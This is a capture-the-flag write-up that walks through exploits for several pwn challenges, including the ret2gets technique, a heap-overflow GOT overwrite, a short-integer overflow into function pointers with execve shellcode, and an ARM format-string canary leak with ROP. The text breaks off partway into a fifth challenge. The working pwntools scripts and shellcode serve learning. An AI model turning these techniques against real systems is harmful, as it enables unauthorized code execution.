minecraft | 80 Solves

look mom i made minecraft!

At first glance this challenge seems pretty straight forward. We’ve got a buffer overflow in main() due to the use of gets(). Beyond that there is not much else of importance; there are some menu options which advocate for the playing of survival mode, and as soon as our world is created we are blown up by a creeper. Pretty typical. We can also choose to exit the infinite loop of main() if we wish. The contents of main can be seen below.

int main(void) {
  setbuf(stdout, NULL);
  while (1) {
    puts("\nM I N C E R A F T\n");
    puts("1. Singleplayer");
    puts("2. Multiplayer");
    if (read_int() != 1) {
      puts("who needs friends???");
      exit(1);
    }
    puts("Creating new world");
    puts("Enter world name:");
    char world_name[64];
    scanf(" ");
    gets(world_name);
    puts("Select game mode");
    puts("1. Survival");
    puts("2. Creative");
    if (read_int() != 1) {
      puts("only noobs play creative smh");
      exit(1);
    }
    puts("Creating new world");
    sleep(1);
    puts("25%");
    sleep(1);
    puts("50%");
    sleep(1);
    puts("75%");
    sleep(1);
    puts("100%");
    puts("\nYOU DIED\n");
    puts("you got blown up by a creeper :(");
    puts("1. Return to main menu");
    puts("2. Exit");
    if (read_int() != 1) {
      return 0;
    }
  }
}

Also it should be noted that this binary has minimal protection. No canary or PIE and partial RELRO.

So we know we have a buffer overflow, and as there is no win() function, we’ll have to return to libc somehow. But how to do that? Well we’ll need a libc leak to even start thinking about that and there isn’t a way to do that as there is. No printf stack leak or other built in primitives. ROP gadget time! But the tried and true pop rdi -> leak GOT with printf or similar -> put /bin/sh into rdi -> ret2 system() pipeline isn’t going to work here. There are no pop rdi gadgets so we will not be able to control the first argument that way.

But never fear! For during Cyberspace’s CTF back in September I found out about a cool technique coined ret2gets. There is a super awesome blog post that I not only used for my exploit here, but also explains this attack very well. It also explains the disappearance of pop rdi; ret gadgets in binaries complied with GLIBC >=2.34. All my homies miss _libc_csu_init, RIP to a legend. Here is the blog. But, here is a quick synopsis.

GLIBC supports multi-threading which means that many functions need to be thread safe to prevent race conditions. These occur when some entity in one thread tries to access something currently in use by another thread, which would obviously present a problem. When called, most libc IO functions will acquire something called a lock on stdin. By placing a lock on something like stdin it tells other threads that try to access it that stdin is in use and can not be used at that time. Here’s where it gets (haha get it?) interesting if it wasn’t already. In the case of most GLIBC IO functions, the macro _IO_acquire_lock is called at the start to acquire the lock and _IO_release_lock is called at the end. _IO_release_lock takes in file pointer to stdin as is seen here in the libc source for of libc which is 2.36. However, while debugging in GDB, I did not see _IO_release_lock nor any of the locking macros discussed in the aforementioned blog. This is most likely due to compiler optimization. But, what we can see is the following instruction seen below.

_IO_2_1_stdin_ + 136 is being loaded into rdi. Doing some research _IO_2_1_stdin_ is the definition of stdin. This would make sense that we’re seeing this knowing what we know about locking functions at the end of gets(). Additionally, _IO_2_1_stdin_ is of type FILE, and as mentioned by sashactf in their blog;

“FILE has a field _lock, which is a pointer to a _IO_lock_t (stored at offset +0x88)”.

0x88 is 136 in decimal. So, we can infer that _IO_2_1_stdin_ + 136 is the location of the _IO_lock_t struct. So, the _IO_lock_t struct is being loaded into rdi at the end of gets(). And, once this is loaded into rdi, gets() returns shortly after without clobbering it. And there you have it! Through the mist and mire of libc IO and locking we have a pointer to libc in rdi when gets() returns. Now the question remains, how do we turn this into an exploit?

Well, since now have a pointer to stdin’s _IO_lock_t struct in rdi, we can simply call gets() again to write into this region. But how does that help us? Before we do anything, we’ll need a libc leak. Here is the layout of this struct;

typedef struct {
    int lock;
    int cnt;
    void *owner;
} _IO_lock_t;

The owner field gets assigned to the address of the TLS struct for the current thread. The TLS (Thread Local Storage) struct is a method to keep track of variables that have one instance per thread; for instance, the stack canary is stored here! Crucially, if we can leak this pointer, we’ll have our libc leak! What we can do is overflow the buffer, call gets() to let us read into this struct, and then send in a payload of 4 chars and three null bytes like so.

p.sendline(b"A" * 4 + b"\x00"*3)

This will over write the lock integer and will set cnt to zero. Setting the count to zero will cause it to underflow because cnt is decremented after a lock is released. See _IO_lock_unlock. If you also look at the aforementioned source of _IO_lock_unlock you’ll see that because of the underflow, the check in the if statement fails and owner does not get set to null. This ensures that the padding up until *owner does not contain a null byte and puts can successfully print out the TLS struct and thus we have our libc leak.

With this leak we can now calculate the base address of libc by setting a breakpoint after our leak and taking a peak in gdb to calculate the offset relative to the base of libc. The python exploit for everything thus far is as follows.

from pwn import *
elf = context.binary = ELF("chall_patched")
libc = ELF('libc.so.6')
context.terminal = ['tmux', 'split-window', '-h']
p = elf.process()
gdb.attach(p, script)
offset = 72
ret = 0x0000000000401016
offset = 72
payload = flat([
    b'a' * 72,
    ret,
    elf.plt.gets,
    elf.plt.gets,
    elf.plt.puts,
    ret,
    elf.symbols['main']
])
p.sendlineafter(b'2. Multiplayer\n', b'1')
p.sendlineafter(b'name:', payload)
p.sendlineafter(b'2. Creative', b'1')
p.sendlineafter(b'2. Exit', b'2')
p.sendline(b"A" * 4 + b"\x00"*3)
p.recvline()
leak = p.recvline()
leak = leak[-7:].strip(b'\n')
leak = u64(leak.ljust(8, b'\x00'))
libc.address = leak + 0x28c0

Here we send in some a’s to fill up the stack space, a ret gadget for some stack alignment, and then we start the meat and potatoes of our ROP chain. We send in the first call to gets() to populate RDI with the _IO_lock_t struct. The second call to gets() allows us to write into that struct up to the address of the TLS struct. Then, we call puts() to print out that address to us and finally we pass in another ret gadget for stack alignment and return to main() for the next bit of our exploit.

Now that we have libc things are pretty straightforward. We’re back in main so we can simply overflow the gets() buffer again to do our traditional ROP chain. We’ll find a pop rdi gadget and the address of a /bin/sh string in libc, and then we’ll return to system. The rest of the exploit can be found below.

pop_rdi = 0x00000000000277e5 + libc.address
binsh = next(libc.search(b"/bin/sh"))
payload2 = flat([
    'a' * offset,
    pop_rdi,
    binsh,
    ret,
    libc.symbols['system']
    ])

p.sendlineafter(b'2. Multiplayer\n', b'1')
p.sendlineafter(b'name:', payload2)
p.sendlineafter(b'2. Creative', b'1')
p.sendlineafter(b'2. Exit', b'2')

p.interactive()

# lactf{miiineeeee_diaaaaamoooonddsssssss_ky8cnd5e}

And then we get the flag! Was a fun challenge and a cool application of the ret2gets technique.

gamedev | 108 Solves

You’ve heard of rogue-likes, but have you heard of heap-likes?

This challenge took me a little bit to reason through. It’s a linked list like challenge where each entry in the list can contain data and pointers to other “levels”. Here is the basic structure.

struct Level *start = NULL;
struct Level *prev = NULL;
struct Level *curr = NULL;

struct Level
{
    struct Level *next[8];
    char data[0x20];
};

As you can see each “level” can store 8 more levels as well as 0x20 bytes of data. There is also a start, prev, and curr pointer kept updated globally. The way I looked at this is levels are added in tiers. Each tier can have eight levels. Pointers to levels in each tier are stored in the first level of that tier. Later we’ll see how you can navigate between tiers as each level in each tier can have eight more levels. The program provides a decent bit of functionality for interacting with this linked list.

The first we’ll examine is the create_level function.

void create_level()
{
    if (prev == curr) {
        puts("We encourage game creativity so try to mix it up!");
        return;
    }

    printf("Enter level index: ");
    int idx = get_num();

    if (idx < 0 || idx > 7) {
        puts("Invalid index.");
        return;
    }

    struct Level *level = malloc(sizeof(struct Level));
    if (level == NULL) {
        puts("Failed to allocate level.");
        return;
    }

    level->data[0] = '\0';
    for (int i = 0; i < 8; i++)
        level->next[i] = NULL;

    prev = level;

    if (start == NULL)
        start = level;
    else
        curr->next[idx] = level;
}

Basically we get to specify an index and our new level is placed on the heap. Everything is pretty straightforward.

Next let’s examine the explore functionality.

void explore()
{
    printf("Enter level index: ");
    int idx = get_num();

    if (idx < 0 || idx > 7) {
        puts("Invalid index.");
        return;
    }

    if (curr == NULL) {
        puts("No level to explore.");
        return;
    }

    curr = curr->next[idx];
}

This will let us select an index of a level at the current “tier”, and that level becomes our current starting level, also the start of a new “tier”. I thought of this like taking a “branch”. This functionality will become useful to us.

Now we can look at the edit_level functionality; this is where things get interesting.

void edit_level()
{
    if (start == NULL || curr == NULL) {
        puts("No level to edit.");
        return;
    }

    if (curr == prev || curr == start) {
        puts("We encourage game creativity so try to mix it up!");
        return;
    }

    printf("Enter level data: ");
    fgets(curr->data, 0x40, stdin);
}

This let’s us edit the level we are currently at. We can traverse levels with the aforementioned explore functionality. You might have noticed something strange though; our Level struct only sets aside 0x20 bytes available for data but here we can enter in as much as 0x40 bytes. So, we’ve got ourselves a wee bit of an overflow.

There’s only a little bit more of functionality to cover. There is a test_level function which lets us print out data at our current level. That function can be seen below.

void test_level()
{
    if (start == NULL || curr == NULL) {
        puts("No level to test.");
        return;
    }

    if (curr == prev || curr == start) {
        puts("We encourage game creativity so try to mix it up!");
        return;
    }

    printf("Level data: ");
    write(1, curr->data, sizeof(curr->data));
    putchar('\n');
}

There is a useful reset function that takes us back to the first “tier” of levels via the global “start” pointer.

void reset()
{
    curr = start;
}

Beyond that everything else is pretty standard. There is a menu function which lets us interact with all of the aforementioned functionality. The main function actually gives us a PIE leak which will be useful for later. There is also an init() function which basically just sets up the linked list by creating the starting level and setting the start and curr pointer. And finally, as far as protections go, the binary has PIE, no canary, partial RELRO, and NX is enabled.

So, how are we going to exploit this? Well, the plan is to use our heap overflow to overwrite a stored Level address to be a function’s GOT address. We’ll use atoi. We’ll use the test_level functionality to print out atoi@got for a libc leak. And then, we’ll use our edit functionality to overwrite atoi to be something like system, performing a GOT overwrite.

Let’s get started. First, we’ll create our linked list layout. We start at tier one where we’ll create three levels. Then, we’ll “explore” to the second level where we’ll create two more levels at this second tier. After we do all this you can see below what the heap layout looks like.

You can see how the blue arrows represent our first “tier” of levels and the lime green represents the second “tier”. What will become important are the pointers to the second “tier” levels stored in chunk/level 2 on the first tier. I’ve labeled those pointers with green arrows. Additionally I include a blue arrow pointing from the initial chunk/level to the second chunk/level just for some more visualization. I wrote some helper python functions which basically interact with the menu so here’s how I used them to set up the aforementioned layout.

# Tier 1
create(1)
create(2)
create(3)

# Branch to tier 2
explore(2)
create(1)
create(2)

# Back to tier 1
reset()

So now that we’ve got our layout set up lets use the reset function to go back to the first tier. From here, we’ll explore to level one and use the overflow to overwrite into the level pointers stored in level 2 on the first tier. We’ll send in 40 a’s, 0x71 to preserve the next size of the chunk, eight c’s to pad out the zero level index, and then a pointer to atoi@got - 0x40. With this we are essentially forging the first level at tier two to be atoi@got - 0x40. We have to include the minus 0x40 because when we eventually “explore” to this level, the program doesn’t know this isn’t a valid next pointer and it will attempt to increment it by 0x40. This is because it is technically the second item in the list (if you index at zero which I didn’t). You can see the code here in explore.

curr = curr->next[idx];

Here is the heap layout once we perform that overwrite.

Now let’s reset to tier one, then explore to the second level in tier one, and then explore to the first level which we have corrupted to be atoi@got - 0x40. Then we can call test_level to print out atoi@got which will be a libc leak. The python code to get this far can be seen below.

reset()
explore(2)
explore(1)

test_level()
p.recvuntil(b'Level data: ')

libc_leak = u64(p.recv()[0:6].ljust(8, b'\x00'))

libc.address = libc_leak - libc.symbols['atoi']
print(hex(libc.address))

Finally we can just call edit_level which will edit the current level which we have corrupted to be atoi@got. We’ll overwrite this with system and we’ll pop a shell! The final bit of code can be seen below.

final = flat([
    libc.symbols['system']
])
edit(final)
p.interactive()

Side note… I tried one gadgets as well as multiple different GOT overwrites and none of them worked. atoi had the least impact on the program and after bashing my head I thought to myself “Why not just use system?”. Evidently one gadgets are not always the answer, who knew?

Super fun challenge and full exploit script is below.

from pwn import *
context.terminal = ['tmux', 'split-window', '-h']
elf = context.binary = ELF("chall_patched")
libc = ELF(b'libc.so.6')
#p = elf.process()
p = remote("chall.lac.tf", 31338)

def create(idx):
    index = str(idx).encode()
    p.sendline(b'1')
    p.sendline(index)

def edit(data):
    p.sendline(b'2')
    p.sendline(data)

def test_level():
    p.sendline(b"3")

def explore(idx):
    p.sendline(b"4")
    p.sendline(str(idx).encode())

def reset():
    p.sendline(b'5')

p.recvline()
leak = p.recvline()
leak = int(leak.split(b': ')[1].strip(b'\n').decode(), 16)
elf.address = leak - elf.symbols['main']

# Tier 1
create(1)
create(2)
create(3)

# Branch 2
explore(2)
create(1)
create(2)

# back to tier 1
reset()
explore(1)
got_atoi = elf.got.atoi - 0x40
payload = flat([
    'b' * 40,
    p64(0x71),
    b'c' * 8,
    got_atoi
])
edit(payload)

reset()
explore(2)
explore(1)
test_level()
p.recvuntil(b'Level data: ')

libc_leak = u64(p.recv()[0:6].ljust(8, b'\x00'))

libc.address = libc_leak - libc.symbols['atoi']
print(hex(libc.address))
final = flat([
    libc.symbols['system']
])
edit(final)
p.interactive()

# lactf{ro9u3_LIk3_No7_R34LlY_RO9U3_H34P_LIK3_nO7_r34llY_H34P}

Had a lot of fun playing this CTF, looking forward to next year!

GymNotes | 54 Solves

Hey Pentester! We hired a professional developer to code our app GymNotes and we were interested in you checking whether it has vulnerabilites or not. It should be hard to find a bug, since our developer has contributed to xz for a long time.

At first I thought this was going to be exploiting an xz vulnerability, but no, just a funny joke. We’re given a zip file to download which contains the gym_notes program, source, a Makefile, and a Dockerfile.

Running checksec we can see that we are dealing with full protections.

Let’s have a look at the source. At first glance it looks like your typical notes challenge, but with some interesting stuff going on.

First, we’ve got some global variables defined that’ll be relevant later.

#define MAX_NOTE_SIZE 1000

struct Note {
  char data[MAX_NOTE_SIZE];
};

struct Note *notes;
static short lastNoteIndex = 0;

Looks like we’ve got a maximum size defined for our notes, a struct to store them, and another struct to store the pointers to those notes, along with a way to index those notes.

void showNote() {
  printf("Choose a note u want to inspect \n", lastNoteIndex);
  printf("> \n");

  short option;
  scanf("%hd", &option);
  getchar();


  option++;
  if(option < 0 || option > lastNoteIndex) {
    printf("Note not found..\n");
    return;
  }

  printf("Note consists of: %s\n\n", notes[option].data);
}

The first function, showNote(), pretty much does exactly that. It allows us to specify a note index, does some checks on our input, then will index the notes struct and show us our note. Next, we’ll look at the addNote() function.

void addNote() {
  char *line = NULL;
  size_t len = 0;
  short nread;

  if(lastNoteIndex > MAX_NOTE_SIZE) {
    printf("Max notes reached..");
    return;
  }

  printf("Write a note (max. %d characters)\n", MAX_NOTE_SIZE);
  printf("> \n");
  nread = getline(&line, &len, stdin);

  if(nread >= MAX_NOTE_SIZE) {
    printf("Too many characters, adding note failed..\n");
    return;
  }

  lastNoteIndex++;
  notes = realloc(notes, (lastNoteIndex+1)*sizeof(struct Note));
  strcpy(notes[lastNoteIndex].data, line);
  printf("Note added!\n");
}

We check if we have exceeded 1000 notes, then our input is taken in with getline(). If we send in too much we get yelled at, and then if not, realloc is called to resize the initial heap chunk (can see this in main() later), and finally our input is copied into the notes struct. See if you can spot the vuln…

The editNote() function is pretty much the same, it just lets us edit a note at a given index.

void editNote() {
  printf("Choose a note u want to edit\n");
  printf("> \n");

  short option;
  scanf("%hd", &option);
  getchar();

  option++;
  if(option < 0 || option > lastNoteIndex) {
    printf("Note not found..\n");
    return;
  }

  printf("What would u like to replace it with?\n");

  char *line = NULL;
  size_t len = 0;
  short nread;

  printf("Write a note (max. %d characters)\n", MAX_NOTE_SIZE);
  printf("> \n");
  nread = getline(&line, &len, stdin);

  if(nread >= MAX_NOTE_SIZE) {
    printf("Too many characters, adding note failed..\n");
    return;
  }

  strcpy(notes[option].data, line);
  printf("Note edited!\n");
}

We’ll skip the delNote() function for now, but lets have a look at this goofy thing.

void (**optionFuncs)();
int optionFuncsSize;
void allowFunctionsExec(int callFromMain, int mode) {
  if(mode % 2 == 0) {
    if (mprotect(optionFuncs, optionFuncsSize, PROT_READ | PROT_WRITE | PROT_EXEC) == -1) {
      perror("mprotect");
      exit(1);
    }
    else {
      printf("mprotect at 0x%lx..\n", optionFuncs);
      return;
    }

    if(mode % 2 != 0 || !callFromMain)
      exit(1);
  }
}

To start, it looks like we’ve got some function pointers defined. The function, allowFunctionsExec, will check to see if the mode variable is even, and if it is, will mprotect the region occupied by the optionFuncs function pointers. Crucially, it will make it executable. We also get an info leak to see where this location is within the program. Interesting…

Let’s look at the main function.

int main(int argc, char *argv[]) {
  setvbuf(stdin, NULL, _IONBF, 0);
  setvbuf(stdout, NULL, _IONBF, 0);
  notes = malloc(sizeof(struct Note));
  strcpy(notes[0].data, "Example Note\n");

 optionFuncsSize = sysconf(_SC_PAGESIZE);
  if (posix_memalign((void**)&optionFuncs, optionFuncsSize, optionFuncsSize) != 0) {
    fprintf(stderr, "Memory allocation failed\n");
    exit(1);
  }

  optionFuncs[0] = showNote;
  optionFuncs[1] = addNote;
  optionFuncs[2] = delNote;
  optionFuncs[3] = editNote;

  allowFunctionsExec(1, 1);

  printf("Welcome to GymNotes!\n");
  short option;
  while(1) {
    printf("1. Show Note\n");
    printf("2. Add Note\n");
    printf("3. Delete Note\n");
    printf("4. Edit Note\n");
    printf("> \n");
    //fflush(stdout);

    scanf("%hd", &option);
    getchar();
    if (option >= 1 && option <= 4) {
      (*optionFuncs[option - 1])();
    } else {
      printf("Invalid option\n");
    }
  }

  return 0;
}

Notably, we malloc the first “note”, which is then used by realloc in the addNote() function above and copy some data into it. Then, posix_memalign is used to allocate some memory (one page) where the function pointers will be placed. Then, those pointers are placed there; the showNote, addNote, delNote and editNote functions. The allowFunctionsExec is called, but we know from above that it will not do anything as the mode variable is odd. Finally we enter our menu and our optionFuncs function pointers are dereferenced and called depending on the choice we make.

And now for the last of the functions, the delNote function. It makes sense to see this one last after looking at everything else.

void delNote() {
  printf("Function 0x%lx isn't implemented yet..\n", (void*)delNote);
}

Super short, and the only thing that it does is give us a leak so that we can see where the delNote function is within the binary. So, we can find the base address.

Now, what to do with all this info? We can infer that since there is a function that will mark the region of memory where the function pointers are executable, we must find a way to call this function, pass in an even mode argument, and then store some shellcode in the area. But how do we do that?

Enter, this section of code present in addNote and editNote with some gaps omitted for brevity.

char *line = NULL;
size_t len = 0;
short nread;

nread = getline(&line, &len, stdin);

if(nread >= MAX_NOTE_SIZE) {
    printf("Too many characters, adding note failed..\n");
    return;
  }

getline will read in an arbitrary amount of bytes, then use malloc to store those bytes somewhere on the heap, and return the number of bytes read in. However, you might notice that the the variable nread is a short. Which means that it can only represent numbers from -32767 to 32767. Sooo…. what if we send in over 32767 characters, get the nread variable to overflow (become negative), and then we get pass the nread >= MAX_NOTE_SIZE check? This would give us a massive heap overflow. Shoutout to my teammates @pawnlord and @athryx for first noticing the issue.

Now, do you remember what was also on the heap? Ahh yes, that array of function pointers…

So what if we overflowed so much on the heap that we could write into this array of function pointers? That is exactly what we are going to do.

Here we have some python code… what we’ll do is send in 32768 bytes (one more than 32767), set a breakpoint within gdb at the point where the array function pointers are dereferenced, and attempt to call the showNote function to see how our cyclic pattern has affected the array.

def add(msg):
    p.sendline(b'2')
    p.sendline(msg)

cyc = cyclic(32768)
add(cyc)
p.sendline(b'1')

Here is the result:

So, we can see that we’ve overflown into the the optionFuncs memory space and our program segfaults when it tries to call part of our cyclic pattern. Using cyclic -l in gdb we know that the optionFuncs array starts at an offset of 2424 characters. Now that we know this works, the next step will be to try and call allowFunctionsExec so that we can mark that space as executable and stash some shellcode there.

But first we need to know where the address of allowFunctionsExec is, so we can just use the delNote function and parse the leak. The ugly beautiful code for that is here.

def delete():                                                                                              
    p.sendline(b'3')                                                                                       
    leaked = p.recv()                                                                                      
    leaked = p.recvline().split(b' ')                                                                      
    del_addr = leaked[1]                                                                                   
    del_addr = int(del_addr.decode(), 16)                                                                  
    return del_addr

base = delete() - 5798
print(f'elf base @ {hex(base)}')
elf.address = base

We also subtract 5798 from the address we leaked as this is the offset to the base address from the delNote function.

Now we’ll try and call allowFunctionsExec. Since we need the second argument to be even, this presents a tad bit of a challenge. It took me a while to find out how to make it so, and embarrassingly, it is not that complicated. Basically whatever option you pass into scanf in the menu ends up in rsi after scanf returns. In other words, we have to make it so that the allowFunctionsExec function pointer is either at the 2nd or 4th indicie in the array of function pointers and then it’ll do its mprotect thing.

The layout of the array after our overflow will look like this

optionFuncs[0] = "aaaaaaaa";
optionFuncs[1] = allowFunctionExec;
optionFuncs[2] = 0;
optionFuncs[3] = 0;

Then we can send in 2 when prompted for an option and we’ll basically call allowFunctionExec. Here is some python code.

payload = b'a' * 2432
payload += p64(allow_funcs)
payload += b'c' * (32768 - (8 + 2432))
add(payload)
p.sendline(b'2')
print(p.recvuntil(b'mprotect at '))
mprotect = int(p.recv().split(b'\n')[0].strip(b'..'), 16)
print(hex(mprotect))

In addition to calling allowFunctionExec, we also get a leak so we know where the beginning of the mprotected section of optionFuncs is.

Here is a lil sample of calling allowFunctionExec.

What next? Well, we can utilize the same vuln in the editNote function such that we put shellcode in that array along with the mprotect pointer that was leaked. Then we can use one of the menu options to call the index where the mprotect pointer resides such that we can jump to that position and execute the shellcode. Here is what the array will look like with our exploit.

optionFuncs[0] = shellcode;
optionFuncs[1] = shellcode;
optionFuncs[2] = shellcode;
optionFuncs[3] = mprotect ptr;

After we send in a payload to make the array look like the above pseudo code, we can use menu option 4 which will execute the mprotect pointer we sent in, and that will jump to the beginning of the optionFuncs array and execute our shellcode. Below is the python we’ll use for this part of the exploit.

def edit(idx, msg):
    p.sendline(b'4')
    p.sendline(idx)
    p.sendline(msg)

shellcode =  b'\x48\x31\xf6\x56\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x54\x5f\x6a\x3b\x58\x99\x0f\x05'
payload2 = b'b' * 2424
payload2 += b'\x61'
payload2 += shellcode
payload2 += p64(mprotect + 1)
payload2 += b'd' * (32768 - (2424 + len(shellcode) ))
edit(b'0', payload2)

p.sendline(b'4')
p.interactive()

Note that we had to do some finagling… The mprotect address ends with 3 zeros. This was causing some termination issues, I believe when the strcpy would copy the data into the buffer. So, I placed a dummy ascii character, 0x61, and then the 23 bytes of shellcode. That takes up 3 indicies of the array. Then the final index, the mprotect pointer + 1 will point back to the start of the array + 1.

Here’s a shot in gdb right when we are calling the mprotect ptr with menu option 4. The red rectangle is where the pointer is being called and the lilac rectangle is the memory layout around that pointer. You can see the ascii \x61, the shellcode, and the mprotect pointer laid out.

And that should give us a shell!

flag{D1d_y0u_G3T_y0Ur_d00R_b4Ck?}

Twas a fun challenge and learned a bit as well!

shelltester-v2 | pwn | 49 Solves

Shellltester was an easy one. I changed the program. Can you solve this one?

First thing we notice after extracting the challenge files from the given zip file is the inclusion of the qemu-arm-satic binary, which means this challenge is likely 32 bit ARM. And, upon running the file command, our suspicions are correct. Let’s run checksec and have a look at what protections we are up against.

So, we can overwrite the GOT if needed, we’ll have a canary to contend with, the stack is marked as “No Execute”, and the binary addresses are not random. With this in mind, let’s throw this in ghidra and find the main function.

undefined4 main(void) {
  setbuf(stdout,(char *)0x0);
  setbuf(stdin,(char *)0x0);
  setbuf(stderr,(char *)0x0);
  puts("Again an easy pwn, but now on a different architecture. Good Luck!");
  vuln();
  return 0;
}

So, looks like buffering is set up for the remote connection and a function (I renamed it to vuln() for reasons which will be apparent later) is called. Let’s have a look at that function.

void vuln(void) {
  char *pcVar1;
  char buffer1 [52];
  char buffer2 [100];
  int local_c;
  
  local_c = __stack_chk_guard;
  puts("Tell me something: ");
  fgets(buffer1,50,stdin);
  printf(buffer1);
  puts("Do you want to say something before you leave?");
  pcVar1 = fgets(buffer2,1000,stdin);
  if (local_c != __stack_chk_guard) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail(pcVar1);
  }
  return;
}

Our input is taken in to one buffer, printed back out at us, and then we are asked to give input into a second buffer.

There are a few key vulnerabilities we’ll leverage to get a shell. The first of which is a printf vulnerability. The first time we are asked for input, it is printed back out at us with the printf function with no format specifier. This will allow us to specify an arbitrary format string (like %p) to leak values off of the stack.

The second is a buffer overflow the second time we are asked for input. The program uses fgets() to read 1000 bytes into a 100 byte buffer.

Now, how do we exploit it? We’ll leverage the printf vulnerability to leak the canary off the stack, bypassing that protection. Then, we’ll find a ROP gadget to load a pointer to the string /bin/sh into r0 (because r0 is the first argument for functions… ARM is fun!) and then call system.

Step 1 is finding that canary. To do so, we’ll use the ol’ trial and error method; sending in some arbitrary format string (E.g %10$p to leak the “10th” element), seeing how far away we are from the canary, and then adjusting that %{x} value until we are able to leak the canary. Here is an example.

Above (you might have to zoom in), I sent the format string %38$p. This means I want the “38th” item on the stack, relative to the first item which would just be the result of %p. The lilac box on the left is the value I leaked with %38$p and the lilac box on the right is that value on the stack. The stack was examined with the pwndbg command of stack 50 right after the printf call. So, the “38th” stack index is 0x40800224. But, we want the canary. To find it, we’ll send in 99 as (why 99? Our buffer size is 100 so we’ll send 99 because a newline is added) and inspect the stack after the fgets call to see how it looks before a potential overflow.

As you can see, our input starts at 0x408001b0 and goes until 0x40800210. Remember, canary’s are usually stored before the base pointer (frame pointer (fp) in ARM’s case) and the return address so that they can do their job and detect memory corruption. As such, it looks like it is at 0x40800214 in the above figure. If you look up two figures, the “38th” element we leaked was at stack address 0x40800200. 0x40800200 - 0x40800214 (the canary address) = -20. So, they are 20 bytes apart. 20 bytes / 4 bytes, because each address is 4 bytes, is 5. So, we can assume that if we increase our format string to %43$p from %38$p we’ll leak the canary. And we do!

Side note, my debugging setup for these challenges on different architectures is the following. First, use tmux to split my terminal down the middle vertically. Then, use pwntools to start the process using whatever qemu emulator is required, in debug mode, in the left window.

from pwn import *
p = process('qemu-arm-static -g 1234 chall'.split())

Finally, use gdb-multiarch -x with a .gdb file in the right window to debug, like so.

file chall
tar ext: 1234
init-pwndbg
break *vuln

So, now that we know we can defeat that canary, how do we call a shell? Well, this challenge took much longer than it should have to solve because I was first looking for gadgets to try a GOT overwrite. Then, after questioning my sanity, I realized that this challenge is STATICALLY LINKED AHHHHHHSHHHHAHHA. So after some internally directed profanity thoughtful deliberation, I knew all I had to do was find a gadget to load a pointer to /bin/sh into r0. Because of the challenge’s statically linked-ness:

1. We have all the gadgets one could ask for
2. The string /bin/sh and system are in the binary requiring no libc leaks

The gadget I chose was ldr r0, [sp, #8]; add sp, sp, #0x14; pop {pc} located at 0x000673cc. This will load something into r0 relative to the stack pointer, increment the stack pointer, and then pop something off the stack into pc to continue the chain of execution. Let’s see that in action. Notice how this is different than x86. In ARM, you usually populate registers by loading relative to the stack instead of popping, and return by popping something into the pc (program counter), which is the equivalent of RIP on ARM. Azeria Labs has a great ARM tutorial.

Let’s see this gadget in action.

We can see that we added 8 bytes of padding since we load r0 with /bin/sh at an offset of #8. Finally, we add some more padding (cs) to account for the add sp, sp, #14 instruction which will increment the stack pointer. That is such that when pop {pc} is called, system() will be sitting right there on the top of the stack waiting to be called.

And that’s that! When running our script that implements this, we get code execution. I quite like ARM and this was a fun challenge. Solve script below.

from pwn import *
elf = context.binary = ELF("chall")

#p = process('qemu-arm-static -g 1234 chall'.split())
p = remote("shelltesterv2.challs.csc.tf", 1337)

ldr_r0_sp = 0x000673cc

p.sendline(b'%43$p')

p.recvuntil(b'Good Luck!')
p.recvline()
p.recvline()
canary = int(p.recvline().rstrip(b'\n'), 16)
binsh = elf.search(b'/bin/sh').__next__()
payload = flat([
    'a' * 100,
    canary,
    0x40800234,
    ldr_r0_sp,
    'b' * 8,
    binsh,
    'c' * 8,
    elf.symbols.system
])
p.sendline(payload)
p.interactive()

#CSCTF{4rm_pwn_1s_c00l_r1ght?}

ticket-bot-v2 | pwn | 63 Solves

Welcome to TicketBot v2.0. We fixed some bugs and added some extra feature!

Shall we look at the protections?

Full protections :gasp

Never fear, let’s have a look in ghidra to see what we are dealing with.

void main(EVP_PKEY_CTX *param_1) {
  init(param_1);
  wellcome();
  do {
    menu();
  } while( true );
}

Inside the main function there are calls to init(), welcome(), and menu. Let’s explore init() first.

int init(EVP_PKEY_CTX *ctx) {
  FILE *__stream;
  long in_FS_OFFSET;
  char randoms [8];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  setvbuf(stdin,(char *)0x0,2,0);
  setvbuf(stdout,(char *)0x0,2,0);
  __stream = fopen("/dev/urandom","rb");
  fgets(randoms,8,__stream);
  fclose(__stream);
  srand((uint)randoms);
  password = rand();
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return password;
}

It looks like some buffering is set up, and then 8 bytes from /dev/urandom are read in to a buffer to seed srand(). Then, the result of rand() is stored in a global variable called password. Next, let’s look at wellcome().

void wellcome(void) {
  long lVar1;
  long in_FS_OFFSET;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  printf("Wellcome to TicketBot v2.0 here is your ticketID %d\n",(ulong)ticketcounter);
  currentticketid = ticketcounter;
  puts("Please tell me why your here:");
  __isoc99_scanf("%32s",tickets + (long)(int)ticketcounter * 0x20);
  if (lVar1 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

Nothing super special happening here. We are prompted for some user input which is stored at an offset within the global tickets variable. Also note that our currentticketid is set to ticketcounter, which at the start is 0.

Next, let’s look in menu().

void menu(void) {
  long in_FS_OFFSET;
  int choice;
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  puts("========================");
  puts("1. New Ticket");
  puts("2. View Ticket");
  puts("3. Service Login");
  puts("========================");
  choice = 0;
  __isoc99_scanf("%d",&choice);
  getchar();
  if (choice == 1) {
    GrabNewTicket();
  }
  else if (choice == 2) {
    ViewTicket();
  }
  else if (choice == 3) {
    ServiceLogin();
  }
  else {
    puts("that is not an option");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return;
}

A pretty standard menu function. We’ve got some new functions to look at, let’s start with GrabNewTicket().

void GrabNewTicket(void) {
  long lVar1;
  long in_FS_OFFSET;
  
  lVar1 = *(long *)(in_FS_OFFSET + 0x28);
  currentticketid = ticketcounter + 1;
  ticketcounter = currentticketid;
  if (5 < (int)currentticketid) {
    ticketcounter = 0;
  }
  printf("your new ticketID is %d\n",(ulong)ticketcounter);
  puts("Please tell me why your here:");
  __isoc99_scanf("%32s",tickets + (long)(int)ticketcounter * 0x20);
